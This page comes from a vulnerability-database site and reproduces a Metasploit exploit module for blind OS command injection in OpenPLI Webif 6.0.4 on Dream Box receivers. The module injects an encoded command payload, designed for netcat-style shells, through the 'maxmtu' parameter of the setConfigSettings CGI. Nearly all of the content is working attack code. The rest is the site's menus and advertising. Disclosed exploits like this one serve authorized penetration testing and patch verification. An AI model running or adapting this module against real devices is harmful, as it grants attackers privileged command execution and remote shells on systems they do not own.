Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

OpenPLI Webif Arbitrary Command Execution

🗓️ 15 Mar 2013 00:00:00Reported by Michael MessnerType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 32 Views

OpenPLI Webif Arbitrary Command Execution vulnerability on Dream Boxes with OpenPLI v3 beta Images. Blind injection allows OS command execution without visible output. Exploits Web Interface 6.0.4-Expert

Code
`  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'OpenPLI Webif Arbitrary Command Execution',  
'Description' => %q{  
Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command  
injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means  
that you will not see any output of your command. A ping command can be used for  
testing the vulnerability. This module has been tested in a box with the next  
features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1  
Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware  
1.06 and Web Interface 6.0.4-Expert (PLi edition).  
},  
'Author' => [ 'm-1-k-3' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'OSVDB', '90230' ],  
[ 'BID', '57943' ],  
[ 'EDB', '24498' ],  
[ 'URL', 'http://openpli.org/wiki/Webif' ],  
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ]  
],  
'Platform' => ['unix', 'linux'],  
'Arch' => ARCH_CMD,  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 1024,  
'DisableNops' => true,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'netcat generic'  
}  
},  
'Targets' =>  
[  
[ 'Automatic Target', { }]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Feb 08 2013'  
))  
end  
  
def exploit  
print_status("#{rhost}:#{rport} - Sending remote command...")  
vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")  
begin  
send_request_cgi(  
{  
'uri' => normalize_uri("cgi-bin", "setConfigSettings"),  
'method' => 'GET',  
'vars_get' => {  
"maxmtu" => "1500&#{payload.encoded}&"  
}  
})  
  
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT  
fail_with(Msf::Exploit::Failure::Unreachable, "#{rhost}:#{rport} - HTTP Connection Failed, Aborting")  
end  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Mar 2013 00:00Current
0.6Low risk
Vulners AI Score0.6
openpli webifarbitrary command executiondream boxesos command injectionblind injectionweb interfaceexploitationvulnerabilityremote command execution
32